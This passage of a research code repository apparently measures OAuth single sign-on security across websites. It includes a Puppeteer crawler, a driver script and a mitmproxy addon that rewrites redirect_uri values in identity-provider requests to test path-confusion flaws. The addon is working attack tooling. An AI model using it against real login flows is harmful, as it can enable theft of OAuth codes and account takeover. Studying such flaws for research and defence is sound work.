os.rename(namefile+"-commands.txt", gen_path+"/"+namefile+"-commands.txt") 199 | except Exception as e: 200 | print(f'exception with this measurement go ahead!!!') 201 | 202 | 203 | print("browser and proxy ready for next measurement") 204 | #time.sleep(90) 205 | time.sleep(30) 206 | 207 | #change this to modify fraction of site of each stint 208 | if(fractionate%35==0): 209 | #save snapshot of sites analyzed and wait for next trance of sites to analyze 210 | print("save temporary snapshot sites analyzed") 211 | with open(gen_path+"/"+p+"-Target[temporary-snapshot].txt", 'a') as f: 212 | for s in range(len(Site_analyzed)): 213 | if s==len(Site_analyzed)-1: 214 | f.write(str(Site_analyzed[s])+"\n") 215 | else: 216 | f.write(str(Site_analyzed[s])+"\n") 217 | #wait 3hr between trance of sites 218 | #time.sleep(10800) 219 | time.sleep(30) 220 | 221 | #save site analyzed 222 | print("save site analyzed") 223 | with open(gen_path+"/"+p+"-Target.txt", 'a') as f: 224 | for s in range(len(Site_analyzed)): 225 | if s==len(Site_analyzed)-1: 226 | f.write(str(Site_analyzed[s])+"\n") 227 | else: 228 | f.write(str(Site_analyzed[s])+"\n") 229 | #remove snapshot of file if present 230 | if os.path.exists(gen_path+"/"+p+"-Target[temporary-snapshot].txt"): 231 | os.remove(gen_path+"/"+p+"-Target[temporary-snapshot].txt") 232 | 233 | #wait before next pathconfusion experiment 234 | print("wait between one path confusion and the other pathconfusion vector") 235 | time.sleep(30) 236 | #time.sleep(180) 237 | -------------------------------------------------------------------------------- /verifysites.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require('puppeteer'); 2 | const FS = require('fs'); 3 | const TLDJS = require('tldjs'); 4 | const ArgParse = require('argparse'); 5 | 6 | let WEBPAGE = null; 7 | let NameSITE = null; 8 | let TAG = null; 9 | let IDP = null; 10 | let IDP_Info = {}; 11 | let XPathSSOElem=null; 12 | let newwindow=false; 13 | let measurement=""; 14 | 15 | function parseArguments() { 16 | let parser = new ArgParse.ArgumentParser({ 17 | add_help:true, 18 | description: 'Argparse example' 19 | }); 20 | 21 | parser.add_argument( 22 | '--parameters', 23 | { 24 | action: 'store', 25 | required: true, 26 | help: 'parameters file' 27 | } 28 | ); 29 | 30 | let args = parser.parse_args(); 31 | PARAMETER= args.parameters; 32 | } 33 | 34 | 35 | async function Oauthurl(checkURL) { 36 | //search for oauth keyworks in url 37 | var identifiers=["redirect_uri","oauth"]; 38 | var arrayLength = identifiers.length; 39 | for (var i = 0; i < arrayLength; i++) { 40 | let res = checkURL.search(identifiers[i]) 41 | if(res >0){ 42 | console.log("oauth keyword found in url"); 43 | console.log(identifiers[i]); 44 | console.log(checkURL); 45 | return true; 46 | } 47 | } 48 | return false; 49 | } 50 | 51 | async function Save_textfile(name,content){ 52 | //save file with HTML 53 | FS.writeFileSync(name,content); 54 | } 55 | 56 | (async() => { 57 | console.log("Step1 get info for the crawler"); 58 | parseArguments(); 59 | let rawdata = FS.readFileSync(PARAMETER); 60 | let params = JSON.parse(rawdata); 61 | WEBPAGE = params["WEBPAGE"]; 62 | NameSITE = params["NameSITE"]; 63 | XPathSSOElem = params["xpath"]; 64 | OutputName = params["name"]; 65 | OutputPath = params["outpath"]; 66 | TAG=params["tag"]; 67 | console.log("parameters received WEBPAGE: %s\nXPathSSOelem: %s\nOutputpath: %s\nOutputName: %s\nTAG: %s",WEBPAGE,XPathSSOElem,OutputPath,OutputName,TAG); 68 | 69 | 70 | //Step2: surf on the login page save initial page url then take a screenshot and then click in the SSO element 71 | console.log("Step2:start the login procedure") 72 | //start browser 73 | //'--proxy-server=http://127.0.0.1:7777', 74 | const browser = await puppeteer.launch({args:['--disable-gpu', 75 | '--no-sandbox', 76 | '--disable-popup-blocking', 77 | '--disable-notifications', 78 | '--password-store=basic', 79 | '--ignore-certificate-errors'], 80 | headless: false, 81 | executablePath: '/bin/google-chrome-stable'}); 82 | 83 | const page = await browser.newPage(); 84 | 85 | try{ 86 | await page.goto(WEBPAGE, {waitUntil: 'load'}); 87 | }catch(ex){ 88 | console.log("error in surfing to the login page!ABORT-EXPERIMENT:YES"); 89 | await browser.close(); 90 | process.exit(101); 91 | } 92 | 93 | let initial_url=page.url(); 94 | //initial_url=initial_url.split("#")[0]; 95 | 96 | var domainbegin = TLDJS.parse(initial_url).domain; 97 | await page.waitForTimeout(5000); 98 | 99 | //take screenshot 100 | await page.screenshot({path: OutputPath+"/"+OutputName+"_Initial.png" ,fullPage: true}); 101 | 102 | //evaluate XPath 103 | try{ 104 | var SSO_Elem = await page.$x(XPathSSOElem); 105 | }catch(ex){ 106 | if(ex.message.includes("Evaluation failed")){ 107 | console.log("evaluation of xpath failed xpath syntactically wrong!"); 108 | await browser.close(); 109 | process.exit(106); 110 | /* 111 | console.log("wrong xpath use backup procedure as selector"); 112 | try{ 113 | await Promise.all([page.click(XPathSSOElem), 114 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]); 115 | }catch(error){ 116 | console.log("error in the click as a selector"); 117 | console.log("click as a selector not working wrong xpath? check if open a new tab"); 118 | } 119 | */ 120 | } 121 | } 122 | 123 | if(SSO_Elem.length>0){ 124 | console.log("found SSO_Elem: %s",SSO_Elem); 125 | try{ 126 | var SSO_Elem = await page.$x(XPathSSOElem); 127 | console.log("SSO_Elem: %s",SSO_Elem); 128 | console.log("use the SSO_Elem to click"); 129 | await Promise.all([SSO_Elem[0].click(), 130 | page.waitForNavigation({timeout:5000, waitUntil: 'networkidle2'})]); 131 | } 132 | catch{ 133 | console.log("click do not caused the redirect check if opened a new windows or stop"); 134 | //means xpath not working or check new windows 135 | 136 | } 137 | }else { 138 | console.log("the xpath is not found stop here the experiment"); 139 | await browser.close(); 140 | //return code for 141 | process.exit(107); 142 | 143 | } 144 | 145 | //gives time to obtain any new tab opened 146 | await page.waitForTimeout(3000); 147 | var Open_Pages = await browser.pages(); 148 | console.log("numbers of pages after click:%s",Open_Pages.length); 149 | await page.waitForTimeout(6000); 150 | 151 | //Step3: identify new open window and take a screenshot of initial tab page after SSO click 152 | console.log("step3:identify if open new window and check oauth param in redirect url"); 153 | 154 | let opentabs = Open_Pages.length; 155 | console.log("numbers of pages after click:%s",Open_Pages.length); 156 | await Open_Pages[1].screenshot({path: OutputPath+"/"+OutputName+"_AfterSSOClick.png" ,fullPage: true}); 157 | 158 | if(opentabs>2){//new window case 159 | //Step4: look at tabs and check the new windows if oauth params in url means right xpath so collect domain idp and close browser 160 | try{ 161 | var tabindex_IDP=-1; 162 | for (var i = 0; i < Open_Pages.length; i++) { 163 | if(Open_Pages[i].url()!=initial_url && Open_Pages[i].url()!="about:blank"){ 164 | //check url contains oauth keywords 165 | console.log("verify that new windows url has oauth keywords"); 166 | url_newwindow=Open_Pages[i].url(); 167 | let test1=await Oauthurl(url_newwindow); 168 | if(test1){ 169 | idp_domain=TLDJS.parse(url_newwindow).domain; 170 | //obtain domain idp and save it to file 171 | //namesite;loginpage;xpathelement;idp_domain 172 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG; 173 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content); 174 | console.log("Click succesfully redirect to a link with oauth param"); 175 | await browser.close(); 176 | process.exit(104); 177 | } 178 | } 179 | } 180 | 181 | console.log("tab index after search:%s",tabindex_IDP); 182 | if (tabindex_IDP===-1){ 183 | console.log("tab not found!!"); 184 | console.log("Open a new tab but not with oauth check xpath! ABORT-EXPERIMENT:YES"); 185 | await browser.close(); 186 | process.exit(103); 187 | } 188 | }catch(ex){ 189 | console.log("error in Step4 inspect test in:"); 190 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem; 191 | console.log(testfailed) 192 | console.log(ex); 193 | await browser.close(); 194 | process.exit(105); 195 | 196 | } 197 | 198 | } 199 | else { 200 | console.log("Step4alt: check url for presence of oauthparam"); 201 | try{ 202 | await page.waitForTimeout(3000); 203 | var check_url=page.url(); 204 | 205 | if(check_url===initial_url){ 206 | //verify differentiation between xpath not found and sso click not working 207 | console.log("no new window and same initial url Xpath SSO not working"); 208 | console.log("unable to trigger IDP login ABORT-EXPERIMENT:YES"); 209 | await browser.close(); 210 | process.exit(102); 211 | } 212 | else{ 213 | //Step4alt: no new window check url if conatins ouauth keyword and then obatin domain idp 214 | console.log("Step4alt: check url if contains oauthparam"); 215 | await page.waitForTimeout(3000); 216 | var check_url=page.url(); 217 | let test= await Oauthurl(check_url); 218 | if(test){ 219 | idp_domain=TLDJS.parse(check_url).domain; 220 | //obtain domain idp and save it to file 221 | //WEBPAGE;loginpage;idp;domain 222 | content=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+idp_domain+"@@@@"+TAG; 223 | Save_textfile(OutputPath+"/"+OutputName+"-updateinfo.txt",content); 224 | console.log("Click succesful idp in url with oauth param"); 225 | await browser.close(); 226 | process.exit(104); 227 | } 228 | else{ 229 | console.log("no oauthparam check correctness xpath sso element"); 230 | await browser.close(); 231 | process.exit(103); 232 | } 233 | } 234 | }catch(ex){ 235 | console.log("error in Step4alt inspect test in:"); 236 | testfailed=NameSITE+"@@@@"+WEBPAGE+"@@@@"+XPathSSOElem+"@@@@"+TAG; 237 | console.log(testfailed); 238 | console.log(ex); 239 | await browser.close(); 240 | process.exit(105); 241 | } 242 | } 243 | 244 | })(); 245 | -------------------------------------------------------------------------------- /Start-SitesVerification.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | from subprocess import PIPE 3 | from subprocess import TimeoutExpired 4 | import urllib.parse 5 | import re,time,json,os,sys,copy 6 | import hashlib 7 | 8 | 9 | def Identify_SSO_idp(idp,SSO): 10 | sso=[] 11 | for i in SSO: 12 | if i["provider"]==idp: 13 | sso.append(i) 14 | return sso 15 | 16 | def GenResultFolder(folder): 17 | #Path output result 18 | if not os.path.exists(folder): 19 | os.makedirs(folder) 20 | else: 21 | print("directory alredy present do not override") 22 | 23 | def UpdateInfo(sites,newinfo,newsites): 24 | print(f'received this new info:{newinfo}') 25 | updatedsites=newsites.keys() 26 | info=newinfo.split("@@@@") 27 | temp={} 28 | print(f'infor after split: {info}') 29 | if(info[0] not in updatedsites): 30 | print(f'site to be updated: {info[0]}') 31 | for s in sites: 32 | if(s["site"]==info[0]): 33 | # 34 | temp=copy.deepcopy(s) 35 | break 36 | print(f'old site info:{temp}') 37 | tomodify={} 38 | #obtain SSO to be modified 39 | for l in temp["loginpages"]: 40 | if(l["loginpage"]==info[1]): 41 | for i in l["SSOs"]: 42 | try: 43 | if(i["tag"] == info[4]): 44 | tomodify=copy.deepcopy(i) 45 | except Exception as e: 46 | if(i["provider"] in info[3]): 47 | tomodify=copy.deepcopy(i) 48 | 49 | #update sso info 50 | tomodify["provider"]=info[3] 51 | 52 | #add to new sites info 53 | for l in temp["loginpages"]: 54 | if(l["loginpage"]==info[1]): 55 | print(f'len sso before:{len(l["SSOs"])}') 56 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"]) 57 | #print(f'before idps:{idptempb}') 58 | l["SSOs"]=[] 59 | l["SSOs"].append(tomodify) 60 | print(f'len sso after:{len(l["SSOs"])}') 61 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"]) 62 | print(f'after idps:{idptempa}') 63 | 64 | print(f'the new site info:{temp}') 65 | newsites[info[0]]=temp 66 | else: 67 | print(f'\nsite:{info[0]} already in the dictionary') 68 | save={} 69 | for s in sites: 70 | if(s["site"]==info[0]): 71 | save=copy.deepcopy(s) 72 | break 73 | 74 | print(f'get old site info:\n{save}\n \nNew info to be added to site:{newinfo}') 75 | 76 | #obtain SSO to be updated 77 | tomodify={} 78 | for l in save["loginpages"]: 79 | if(l["loginpage"]==info[1]): 80 | for i in l["SSOs"]: 81 | try: 82 | if(i["tag"] == info[4]): 83 | tomodify=copy.deepcopy(i) 84 | except Exception as e: 85 | if(i["provider"] in info[3]): 86 | tomodify=copy.deepcopy(i) 87 | 88 | #update info 89 | tomodify["provider"]=info[3] 90 | 91 | #add info to new site 92 | temp= newsites[info[0]] 93 | print(f'old site info:\n{temp}') 94 | print(f'new SSO:{tomodify}') 95 | for l in temp["loginpages"]: 96 | if(l["loginpage"]==info[1]): 97 | print(f'len sso before:{len(l["SSOs"])}') 98 | idptempb=','.join(str(x["provider"]) for x in l["SSOs"]) 99 | print(f'before idps:{idptempb}') 100 | l["SSOs"].append(tomodify) 101 | print(f'len sso after:{len(l["SSOs"])}') 102 | idptempa=','.join(str(x["provider"]) for x in l["SSOs"]) 103 | print(f'after idps:{idptempa}') 104 | print(f'the new site info:{temp}') 105 | newsites[info[0]]=temp 106 | 107 | 108 | if __name__ == "__main__": 109 | #input experiment: site and login pages 110 | #output experiment: file site verified for each logipage each idp xpath and 111 | sites = json.load(open(sys.argv[1],'r')) 112 | outputfolder=sys.argv[2] 113 | 114 | 115 | Site_analyzed=[] 116 | Nologinpage=[] 117 | NoSSOs=[] 118 | #key site and content site info 119 | updatedsites=dict() 120 | #site key and loginpage/idp value 121 | Missing_Xpath=dict() 122 | Wrong_SSOelement=dict() 123 | Syntactical_Wrong_Xpath=dict() 124 | CrawlerCrash=dict() 125 | NoActionElement=dict() 126 | EmptyResult=dict() 127 | 128 | #site key and list of loginpage as value 129 | Logingpage_unreachable=dict() 130 | start_time = time.time() 131 | 132 | GenResultFolder(outputfolder) 133 | 134 | 135 | for site in sites: 136 | if(not site['loginpages']): 137 | print(f'Site{site["site"]} without login pages') 138 | Nologinpage.append(site["site"]) 139 | continue 140 | 141 | Site_analyzed.append(site["site"]) 142 | for l in site['loginpages']: 143 | #no SSO move to next login page 144 | if(len(l["SSOs"])==0): 145 | NoSSOs.append(site["site"]) 146 | continue 147 | 148 | Idp_sso=l["SSOs"] 149 | for s in Idp_sso: 150 | print(f'Test idp:{s["provider"]} on site: {site["site"]} loginpage:{l["loginpage"]}') 151 | 152 | try: 153 | if("//script" in s["xpath"]): 154 | continue 155 | 156 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest() 157 | namefile=str(site['site'])+"-"+str(pagehash) 158 | 159 | except Exception as e: 160 | 161 | print("site with no xpath?") 162 | #key site and login page/idp 163 | if(site["site"] not in Missing_Xpath.keys()): 164 | Missing_Xpath[site["site"]]=[] 165 | Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 166 | 167 | else: 168 | Missing_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 169 | 170 | continue 171 | 172 | #build parameter file for crawler 173 | paramfile="paramfile.json" 174 | 175 | paramters={ 176 | "WEBPAGE":l["loginpage"], 177 | "NameSITE":site["site"], 178 | "xpath":s["xpath"], 179 | "name":namefile, 180 | "outpath":outputfolder, 181 | "tag":s["tag"] 182 | } 183 | print(f'parameters generated:{paramters}') 184 | time.sleep(2) 185 | 186 | with open(paramfile, 'w') as f: 187 | json.dump(paramters,f) 188 | 189 | #parameter file 190 | cmd=["node","verifysites.js"] 191 | cmd.append("--parameters="+paramfile) 192 | 193 | time.sleep(2) 194 | #start crawler 195 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True) 196 | print("crawler started") 197 | time.sleep(3) 198 | #wait the crawler to terminate and get return code 199 | crawlresult=-1 200 | try: 201 | crawlresult=Crawler_subproc.wait(timeout=120) 202 | except TimeoutExpired: 203 | print("crawler blocked kill it and go ahead") 204 | crawlresult=Crawler_subproc.kill() 205 | 206 | print(f'print result Execution(return code subprocess) crawler:{crawlresult}') 207 | 208 | outs=Crawler_subproc.stdout 209 | buff=outs.read() 210 | print(f'output of crawler:{buff}') 211 | 212 | #save crawler output 213 | with open(namefile+"-crawlerlog.txt", 'w') as f: 214 | f.write(buff) 215 | 216 | time.sleep(2) 217 | print(f'before checking crawlresult:{crawlresult}') 218 | if(crawlresult==104): 219 | print("result of crawler succesfull") 220 | #update site info: 221 | with open(outputfolder+"/"+namefile+"-updateinfo.txt",'r') as f: 222 | newinfo=f.read() 223 | print(f'new info obtained by the crawler:{newinfo}') 224 | 225 | UpdateInfo(sites,newinfo,updatedsites) 226 | 227 | elif(crawlresult==102): 228 | print("xpath not producing any action discard element") 229 | 230 | if(site["site"] not in NoActionElement.keys()): 231 | NoActionElement[site["site"]]=[] 232 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 233 | else: 234 | NoActionElement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 235 | 236 | 237 | 238 | elif(crawlresult==107): 239 | print("search xpath fail no element found wrong xpath") 240 | #EmptyResult 241 | if(site["site"] not in EmptyResult.keys()): 242 | EmptyResult[site["site"]]=[] 243 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"]) 244 | else: 245 | EmptyResult[site["site"]].append(l["loginpage"]+";"+s["provider"]) 246 | 247 | 248 | 249 | elif(crawlresult==106): 250 | print("search xpath fail syntactically wrong xpath") 251 | 252 | if(site["site"] not in Syntactical_Wrong_Xpath.keys()): 253 | Syntactical_Wrong_Xpath[site["site"]]=[] 254 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 255 | else: 256 | Syntactical_Wrong_Xpath[site["site"]].append(l["loginpage"]+";"+s["provider"]) 257 | 258 | 259 | elif(crawlresult==101): 260 | print(f'login page unreachable') 261 | 262 | if(site["site"] not in Logingpage_unreachable.keys()): 263 | Logingpage_unreachable[site["site"]]=[] 264 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"]) 265 | else: 266 | Logingpage_unreachable[site["site"]].append(l["loginpage"]+";"+s["provider"]) 267 | 268 | elif(crawlresult==105): 269 | print("manually anlyze this site because of crawler error") 270 | 271 | if(site["site"] not in CrawlerCrash.keys()): 272 | CrawlerCrash[site["site"]]=[] 273 | CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"]) 274 | else: 275 | CrawlerCrash[site["site"]].append(l["loginpage"]+";"+s["provider"]) 276 | 277 | elif(crawlresult==103): 278 | print("no oauth parameters in redirection link after click") 279 | 280 | if(site["site"] not in Wrong_SSOelement.keys()): 281 | Wrong_SSOelement[site["site"]]=[] 282 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 283 | else: 284 | Wrong_SSOelement[site["site"]].append(l["loginpage"]+";"+s["provider"]) 285 | 286 | #move file to experiment folder 287 | os.rename(namefile+"-crawlerlog.txt", outputfolder+"/"+namefile+"-crawlerlog.txt") 288 | 289 | print("browser ready for next measurement") 290 | time.sleep(2) 291 | 292 | #print new info site 293 | output_name=outputfolder+"/"+"Result-newinfo.json" 294 | File = open(output_name, "w+") 295 | File.write(json.dumps(updatedsites)) 296 | File.close() 297 | 298 | with open(outputfolder+"/"+"Result-NoSSos.txt", 'w') as f: 299 | for s in range(len(NoSSOs)): 300 | f.write(str(NoSSOs[s])+"\n") 301 | 302 | with open(outputfolder+"/"+"Result-Nologinpage.txt", 'w') as f: 303 | for s in range(len(Nologinpage)): 304 | f.write(str(Nologinpage[s])+"\n") 305 | 306 | #print problem site 307 | output_name=outputfolder+"/"+"Result-Missing_Xpath.json" 308 | File = open(output_name, "w+") 309 | File.write(json.dumps(Missing_Xpath)) 310 | File.close() 311 | 312 | #print problem site 313 | output_name=outputfolder+"/"+"Result-Wrong_SSOelement.json" 314 | File = open(output_name, "w+") 315 | File.write(json.dumps(Wrong_SSOelement)) 316 | File.close() 317 | 318 | #print problem site 319 | output_name=outputfolder+"/"+"Result-Syntactical_Wrong_Xpath.json" 320 | File = open(output_name, "w+") 321 | File.write(json.dumps(Syntactical_Wrong_Xpath)) 322 | File.close() 323 | 324 | #print crash crawler site 325 | output_name=outputfolder+"/"+"Result-CrawlerCrash.json" 326 | File = open(output_name, "w+") 327 | File.write(json.dumps(CrawlerCrash)) 328 | File.close() 329 | 330 | #EmptyResult 331 | #print not oauth element 332 | output_name=outputfolder+"/"+"Result-EmptyResult.json" 333 | File = open(output_name, "w+") 334 | File.write(json.dumps(EmptyResult)) 335 | File.close() 336 | 337 | #print not oauth element 338 | output_name=outputfolder+"/"+"Result-NoActionElement.json" 339 | File = open(output_name, "w+") 340 | File.write(json.dumps(NoActionElement)) 341 | File.close() 342 | 343 | #print problem site 344 | output_name=outputfolder+"/"+"Result-Logingpage_unreachable.json" 345 | File = open(output_name, "w+") 346 | File.write(json.dumps(Logingpage_unreachable)) 347 | File.close() 348 | 349 | 350 | save=list(updatedsites.values()) 351 | print("save updated site analyzed") 352 | output_name="Verified_Sites.json" 353 | File = open(output_name, "w+") 354 | File.write(json.dumps(save)) 355 | File.close() 356 | 357 | #extract top IdPs from file generated 358 | sites = json.load(open(output_name,'r')) 359 | 360 | Site_analyzed=[] 361 | IDP=dict() 362 | 363 | for site in sites: 364 | if(not site['loginpages']): 365 | continue 366 | for l in site['loginpages']: 367 | #no SSO move to next login page 368 | if(len(l["SSOs"])==0):continue 369 | 370 | for s in l["SSOs"]: 371 | if(s["provider"] not in IDP.keys()): 372 | IDP[s["provider"]]=[site["site"]] 373 | else: 374 | if(site["site"]not in IDP[s["provider"]]): 375 | IDP[s["provider"]].append(site["site"]) 376 | else: 377 | continue 378 | 379 | arranged=sorted(IDP, key=lambda k: len(IDP[k]), reverse=True) 380 | for k in arranged: 381 | print(f'idp:{k}\n{IDP[k]}') 382 | with open("Top_Idps.json",'w') as f: 383 | for i in arranged: 384 | #only IdPs with more than 3 sites are considered 385 | if(len(IDP[i])>3): 386 | t={"idp":i,"sites":IDP[i]} 387 | json.dump(t,f) 388 | 389 | -------------------------------------------------------------------------------- /tamper_http_header-path_conf.py: -------------------------------------------------------------------------------- 1 | from mitmproxy.net.http.http1.assemble import assemble_request 2 | import sys,typing,os 3 | import urllib.parse 4 | from urllib.parse import urlparse 5 | from mitmproxy import ctx 6 | from mitmproxy import exceptions 7 | from mitmproxy import types 8 | 9 | class PathConfString: 10 | Keywords=[] 11 | LinkPrefix=[] 12 | 13 | def load(self, loader): 14 | loader.add_option( 15 | name = "inject", 16 | typespec = str, 17 | default = "", 18 | help = "Provide the pathconfusion string", 19 | ) 20 | 21 | loader.add_option( 22 | name = "linkprefix0", 23 | typespec = str, 24 | default = "", 25 | help = "link prefix where to inject the path confusion", 26 | ) 27 | 28 | loader.add_option( 29 | name = "linkprefix1", 30 | typespec = str, 31 | default = "", 32 | help = "link prefix where to inject the path confusion", 33 | ) 34 | 35 | loader.add_option( 36 | name = "counter", 37 | typespec = int, 38 | default = 1, 39 | help = "Define how many request modify", 40 | ) 41 | 42 | loader.add_option( 43 | name = "keywords0", 44 | typespec = str, 45 | default = "", 46 | help = "keyword to identify network reqest to modify", 47 | ) 48 | 49 | loader.add_option( 50 | name = "keywords1", 51 | typespec = str, 52 | default = "", 53 | help = "keyword to identify network reqest to modify", 54 | ) 55 | 56 | loader.add_option( 57 | name = "keywords2", 58 | typespec = str, 59 | default = "", 60 | help = "keyword to identify network reqest to modify", 61 | ) 62 | 63 | loader.add_option( 64 | name = "keywords3", 65 | typespec = str, 66 | default = "", 67 | help = "keyword to identify network reqest to modify", 68 | ) 69 | 70 | loader.add_option( 71 | name = "keywords4", 72 | typespec = str, 73 | default = "", 74 | help = "keyword to identify network reqest to modify", 75 | ) 76 | 77 | loader.add_option( 78 | name = "idphostname", 79 | typespec = str, 80 | default = "", 81 | help = "hostname of idp to be intercepted and modified", 82 | ) 83 | 84 | 85 | def checkurlkeywords(self,flow): 86 | self.Keywords.append(ctx.options.keywords0) 87 | self.Keywords.append(ctx.options.keywords1) 88 | self.Keywords.append(ctx.options.keywords2) 89 | self.Keywords.append(ctx.options.keywords3) 90 | self.Keywords.append(ctx.options.keywords4) 91 | 92 | self.Keywords=list(filter(None, self.Keywords)) 93 | 94 | for i in self.Keywords: 95 | if i not in flow.request.url: 96 | return False 97 | 98 | return True 99 | 100 | def checkurlprefix(self,flow): 101 | self.LinkPrefix.append(ctx.options.linkprefix0) 102 | self.LinkPrefix.append(ctx.options.linkprefix1) 103 | 104 | self.LinkPrefix=list(filter(None, self.LinkPrefix)) 105 | 106 | found=False 107 | for i in self.LinkPrefix: 108 | if i in flow.request.url: 109 | found=True 110 | 111 | if found: return True 112 | return False 113 | 114 | 115 | def request(self,flow): 116 | print("inspecting request", file=sys.stdout) 117 | if ctx.options.counter<=0:return 118 | 119 | if flow.request.method.strip().upper() == 'GET': 120 | checkurl = urlparse(flow.request.url) 121 | #inspect only request with the IDP as domain 122 | if(ctx.options.idphostname in checkurl.hostname): 123 | print("request with idphostname", file=sys.stdout) 124 | #check request with the right prefix 125 | if not self.checkurlprefix(flow): return 126 | 127 | print(f'found link with rightprefix: {flow.request.url}',file=sys.stdout) 128 | #check request url with the right keywords 129 | if not self.checkurlkeywords(flow): return 130 | 131 | print("found a good candidate request to modify", file=sys.stdout) 132 | 133 | ctx.options.counter-=1 134 | if ctx.options.counter>=1: 135 | print("first request ignore it",file=sys.stdout) 136 | return 137 | 138 | multi_cmd=False 139 | if("+" in ctx.options.inject):multi_cmd=True 140 | #modify last w remove it or attach 141 | if("mdf" in ctx.options.inject and "lw" in ctx.options.inject): 142 | #modify last word of redirect uri 143 | b=flow.request.url.find("redirect_uri") 144 | f=flow.request.url.find("&",b) 145 | if(f>0): 146 | #find next param or end of string 147 | print(f'f greather than 0 so internal param', file=sys.stdout) 148 | ret=flow.request.url[b+13:f] 149 | else: 150 | ret=flow.request.url[b+13:] 151 | print(f'extracted redirect uri: {ret}', file=sys.stdout) 152 | #search / or %2f from end of redirect_uri 153 | cut=ret.rfind("/") 154 | if(cut<0): 155 | cut=ret.rfind('%2f') 156 | if(cut<0): 157 | cut=ret.rfind('%2F') 158 | if(cut<0): 159 | print("not able to find / or %2f or %2F",file=sys.stdout) 160 | return 161 | #modify word if larger than mod requested 162 | mod=4 163 | if(len(ret)-cut>mod): 164 | t=len(ret)-mod 165 | print(f'extracted string to capitalize: {ret[t:]}',file=sys.stdout) 166 | up=ret[t:].upper() 167 | print(f'upper string:{up}',file=sys.stdout) 168 | new=ret[:t]+up 169 | print(f'temp string modified with replace: {new}', file=sys.stdout) 170 | temp=flow.request.url 171 | bb=temp.replace(ret,new) 172 | flow.request.url=bb 173 | return 174 | else: 175 | print(f'world shorter: {len(ret)-cut} than mod requested {mod}',file=sys.stdout) 176 | return 177 | elif("rm" in ctx.options.inject and "lw" in ctx.options.inject): 178 | #modify last word of redirect uri 179 | b=flow.request.url.find("redirect_uri") 180 | f=flow.request.url.find("&",b) 181 | if(f>0): 182 | ret=flow.request.url[b+13:f] 183 | else: 184 | ret=flow.request.url[b+13:] 185 | #search / or %2f from end of redirect_uri 186 | cut=ret.rfind("/") 187 | if(cut<0): 188 | encut=ret.rfind('%2f') 189 | if(encut<0): 190 | encut=ret.rfind('%2F') 191 | if(encut<0): 192 | print("not able to find / or %2f",file=sys.stdout) 193 | return 194 | #remove last word 195 | print(f'ret string:{ret} len: {len(ret)}',file=sys.stdout) 196 | if(cut<0): 197 | print(f'found separator at position {encut} string from cut on {ret[encut:]} before cut {ret[:encut]}') 198 | else: 199 | print(f'found separator at position {cut} string from cut on {ret[cut:]} before cut {ret[:cut]}') 200 | 201 | if(cut<0): 202 | #means I found the encoded add 3 to keep / encoded 203 | new=ret[:encut] 204 | else: 205 | #normal char #add 1 to keep / 206 | new=ret[:cut] 207 | 208 | temp=flow.request.url 209 | bb=temp.replace(ret,new) 210 | flow.request.url=bb 211 | print(f'temp string modified with replace: {new}', file=sys.stdout) 212 | print(f'new temporary url: {flow.request.url}', file=sys.stdout) 213 | 214 | if(not multi_cmd):return 215 | else:second=ctx.options.inject.split("+")[1] 216 | 217 | print("at this point removed last word plus attach attack",file=sys.stdout) 218 | print("attach pathconfusion",file=sys.stdout) 219 | 220 | b=flow.request.url.find("redirect_uri") 221 | f=flow.request.url.find("&",b) 222 | 223 | if(f>0): 224 | #find next param or end of string 225 | print(f'f greather than 0 so internal param', file=sys.stdout) 226 | ret=flow.request.url[b+13:f] 227 | else: 228 | ret=flow.request.url[b+13:] 229 | print(f'extracted redirect uri: {ret}', file=sys.stdout) 230 | 231 | #try use lib to concatenate pathconfusion 232 | test1=urllib.parse.unquote(ret) 233 | print(f'test url unquoted: {test1}', file=sys.stdout) 234 | test=urlparse(test1) 235 | testpath=test.path 236 | print(f'test path extracted: {testpath}', file=sys.stdout) 237 | print(f'used second as inject string: {second}',file=sys.stdout) 238 | newpath=testpath+second 239 | print(f'new path generated: {newpath}', file=sys.stdout) 240 | newurl=test._replace(path=newpath).geturl() 241 | print(f'new url generated(unquoted): {newurl}', file=sys.stdout) 242 | quotedurl=urllib.parse.quote(newurl, safe='') 243 | print(f'new url generated(quoted): {quotedurl}', file=sys.stdout) 244 | 245 | temp=flow.request.url 246 | print(f'temp string: {temp}', file=sys.stdout) 247 | new=temp.replace(ret,quotedurl) 248 | print(f'temp string modified with replace: {new}', file=sys.stdout) 249 | flow.request.url=new 250 | 251 | else: 252 | print("only attach the pathconfusion string",file=sys.stdout) 253 | 254 | b=flow.request.url.find("redirect_uri") 255 | f=flow.request.url.find("&",b) 256 | g=flow.request.url.find('%3F',b) 257 | 258 | if(f0): 261 | #find next param or end of string 262 | print(f'f greather than 0 so internal param', file=sys.stdout) 263 | ret=flow.request.url[b+13:f] 264 | else: 265 | ret=flow.request.url[b+13:] 266 | else: 267 | print(f'in this case %3F is present and it is before & pos%3F:{g} pos&:{f}', file=sys.stdout) 268 | print(f'g greather than 0 so internal param', file=sys.stdout) 269 | ret=flow.request.url[b+13:g] 270 | 271 | 272 | print(f'extracted redirect uri: {ret}', file=sys.stdout) 273 | #try use lib to concatenate pathconfusion 274 | #test1=urllib.parse.unquote(ret) 275 | test1=ret 276 | print(f'test url unquoted: {test1}', 